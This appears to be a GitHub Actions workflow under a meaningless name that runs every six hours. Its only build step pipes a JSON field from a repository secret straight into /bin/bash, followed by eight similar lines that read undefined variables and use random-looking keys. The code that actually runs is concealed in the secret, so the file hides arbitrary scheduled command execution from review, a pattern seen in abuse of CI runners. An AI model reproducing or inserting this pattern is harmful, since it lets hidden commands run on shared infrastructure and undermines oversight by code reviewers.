name: wurenwenfeng

on:
  workflow_dispatch:
  schedule:
    - cron: '44 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wurenwenfeng
        env:
          z7364: ${{ secrets.z7364 }}
        run: |
          echo $z7364 | jq -r .jq486 | /bin/bash
          echo $keqm3832 | jq -r .bpfhy7012 | /bin/bash
          echo $unkfm4 | jq -r .r48 | /bin/bash
          echo $sfuxy6 | jq -r .omoh70 | /bin/bash
          echo $betzm8702 | jq -r .fmb44 | /bin/bash
          echo $kcip01852 | jq -r .njp3 | /bin/bash
          echo $qvl08715 | jq -r .wn944 | /bin/bash
          echo $yj84 | jq -r .u09 | /bin/bash
          echo $z521 | jq -r .yjhsm647 | /bin/bash

